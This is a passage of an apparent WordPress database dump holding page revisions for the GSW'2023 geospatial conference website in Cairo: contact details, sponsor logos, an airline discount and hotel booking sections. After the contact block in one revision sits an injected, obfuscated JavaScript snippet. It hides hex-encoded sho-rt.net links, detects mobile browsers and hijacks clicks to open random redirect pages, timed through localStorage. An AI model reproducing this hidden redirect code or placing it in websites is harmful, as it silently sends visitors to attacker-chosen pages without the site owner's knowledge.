st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-24 01:39:13','2023-06-24 01:39:13','',3066,'https://gsw2023.com/?p=4801',0,'revision','',0),
(4802,1,'2023-06-24 01:40:04','2023-06-24 01:40:04','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: 